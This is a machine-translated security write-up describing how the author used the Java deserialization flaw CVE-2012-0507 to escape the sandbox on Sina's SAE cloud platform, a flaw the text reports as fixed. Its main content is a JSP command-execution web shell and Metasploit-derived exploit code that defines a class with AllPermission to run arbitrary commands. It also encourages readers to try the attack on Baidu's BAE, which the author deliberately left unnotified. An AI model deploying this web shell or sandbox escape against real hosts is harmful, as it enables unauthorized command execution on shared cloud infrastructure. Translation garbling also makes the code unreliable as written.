SAE Cloud Service Security Sandbox Bypass

Ps: This vulnerability has been fixed by Sina.
Summary
Sina cloud service (SAE) provides PHP, JAVA, and other environments for users to build websites on the same cloud. to prevent malicious users from DDOS attacks on the cloud, when other cloud users are hacked, security restrictions must be imposed, at least some key functions cannot be called. Java has a perfect solution for this kind of requirement. It provides a security sandbox, which limits many functions. However, when java has a vulnerability, CVE20120507 was released this year, bypassing the Security JAVA sandbox. In the news, this vulnerability was used to hack Apple computers. This vulnerability-related technology has been analyzed by foreigners, and has been analyzed in China. Although the author still has doubts, it has not gone into depth. Therefore, we will not be ugly about the principles. The purpose of this article is to use this vulnerability in another scenario.
Body
As mentioned above, this vulnerability serves as a sandbox of bypass java, which is used by hackers to make the sandbox of the by pass applet. This causes some Apple computers to be hacked. Bypass applet sandbox is mainly used. When a browser accesses a website, it processes the applet application. The applet itself uses security Manage and policy file combination to make the sandbox, attackers can execute arbitrary code after bypassing the sandbox. (If not bypassed, only limited and harmless code can be executed ). So with exp, You can rebound the connection and so on.
Since this vulnerability can be a bypass sandbox, it should not be simply an applet sandbox in theory. As far as the author knows, there is also a place for the sandbox to be used, that is, the legendary cloud. For example, GAE, SAE, BAE, and other cloud services that allow java websites but have a lot of restrictions.
Let's start with SAE (fixed when the article was published). At present, SAE is still in the test phase and requires an invitation code to use it. Let's look at the limitations of sandbox.
SAE sandbox:
For example, to execute the system command, the rumtime.exe c function is not allowed to be called. The following code will test and check the restriction information.
<% @ Page
Import = "msf. x. *, java. io. *, java. util. concurrent. atomic. AtomicReferenceArray" %>
<%
Java. lang. Process process = null;
Process = Runtime. getRuntime ()
. Exec (request. getParameter ("cmd "));
ByteArrayOutputStream resultOutStream = new ByteArrayOutputStream ();
InputStream processInStream = new BufferedInputStream (
Process. getInputStream ());
BufferedReader buffer = new java. io. BufferedReader (
New java. io. InputStreamReader (processInStream ));
Int num = 0;
String strresult = "";
String result = "";
While (strresult = buffer. readLine ())! = Null ){
Result + = strresult;
}
%> <% = Result %>
<%
ProcessInStream. close ();
ProcessInStream = null;
ResultOutStream. close ();
ResultOutStream = null;
 
%> Www.2cto.com
After the upload, execute:
Http://1.javasec.sinaapp.com/cmd.jsp? Cmd = ls-l
The result page shows insufficient permissions:
 

This is the classic tip for sandbox permission restrictions, whether it is the applet sandbox or the cloud sandbox.
You can use cve20120507.
Let's repeat the code principle. Someone has already translated it in China.
Bypass3.jsp code. This file puts the Help class into the work Function of the Help class:
<%
Try {
Byte [] arrayOfByte = {here is a code that can be found by google };
ObjectInputStream localObjectInputStream = new ObjectInputStream (
New ByteArrayInputStream (arrayOfByte ));
Object [] arrayOfObject = (Object []) (Object []) localObjectInputStream
. ReadObject ();
Help [] arrayOfHelp = (Help []) (Help []) arrayOfObject [0];
AtomicReferenceArray localAtomicReferenceArray = (AtomicReferenceArray) arrayOfObject [1];
ClassLoader localClassLoader = getClass (). getClassLoader ();
LocalAtomicReferenceArray. set (0, localClassLoader );
Help localHelp = arrayOfHelp [0];
%> <% = Help. doWork (localHelp, request. getParameter ("cmd"). toString () %> <%
} Catch (Exception e ){
}
%>
The Code calls the code of a class and the Help class. The Code is as follows:
String String1 = "ExpFile"; // This is the class name of expfile.
Class localClass = null;
Byte [] classData1 = {-54,-2,-70,-66, 0, 0, 0, 50, 0...
Here is the content in the byte array form of expfile. class. Read this file directly and output the byte array .};
URL localURL = new URL ("file :///");
Certificate [] arrayOfCertificate = new Certificate [0];
Permissions localPermissions = new Permissions ();
LocalPermissions. add (new AllPermission ());
ProtectionDomain localProtectionDomain = new ProtectionDomain (
New CodeSource (localURL, arrayOfCertificate ),
LocalPermissions );
Try {
Class c = paramHelp. loadClass (String1 );
LocalClass = c;
} Catch (Exception e ){
LocalClass = paramHelp. defineClass (String1, classData1, 0,
ClassData1.length, localProtectionDomain );
}
Field localField1 = localClass. getField ("data ");
LocalField1.set (localClass, cmd );
ParamHelp = null;
If (localClass! = Null ){
LocalClass. newInstance ();
}
Field localFieldresult = localClass. getField ("cmdresult ");
String sresult = localFieldresult. get (localClass). toString ();
Return sresult;
C, and then get the execution result, so it will not be released.
This code is from the MSF framework and modified in part:
Try {
Class c = paramHelp. loadClass (String1 );
LocalClass = c;
} Catch (Exception e ){
LocalClass = paramHelp. defineClass (String1, classData1, 0,
ClassData1.length, localProtectionDomain );
}
This is a very important technique. The code generated by the MSF framework is executed once in the applet. It is enough to rebound the connection, download the exe, and so on. No exception will occur. Even if the page is opened next time, the execution is started again. However, when executed in the web, it usually needs to be executed multiple times, and the classloader of the web Container will not restart, so exceptions will inevitably occur.
Principle:
ClassLoader (paramHelp: This object inherits classLoader). When the second defineClass method is executed, the same class will be loaded twice (the expfile class is reloaded here). In the classloader of java, it is not allowed to reload the same class, so an error is reported. To solve this problem, we had to use a try and cache structure. If the current classloader has already loaded the expfile class, it will be used directly without loading the same class again. Only by solving this problem can the MSF code originally used on the applet be executed multiple times on the web. Otherwise, the result must be: the first time you access the page, the execution is successful, and the second time, error.
The effect is as follows:
 
In this result, the execution of runtime.exe c is not allowed and the execution result is returned. This vulnerability has been reported to Sina security personnel and has been fixed. Upgrade JRE to fix the vulnerability. After the vulnerability is fixed, null is returned.
This is the result of SAES. BAE (Baidu's cloud) is not powerful and does not give me a verification code, so we will not inform them of the vulnerability. If there is any vulnerability, let's test it by yourself.
Java has many similar vulnerabilities. Although the announcement on the vulnerabilities shows the impact of the vulnerabilities, there are actually many attack methods, but one of them is extremely harmful, as a result, people focus on this and ignore the important information given in the original announcement. After this vulnerability has been detected for so long, oracle has released patches. We have upgraded the jre on the local machine, but ignored the impact on the server.
By kxlzx http://www.inbreak.net Weibo: http://t.qq.com/javasecurity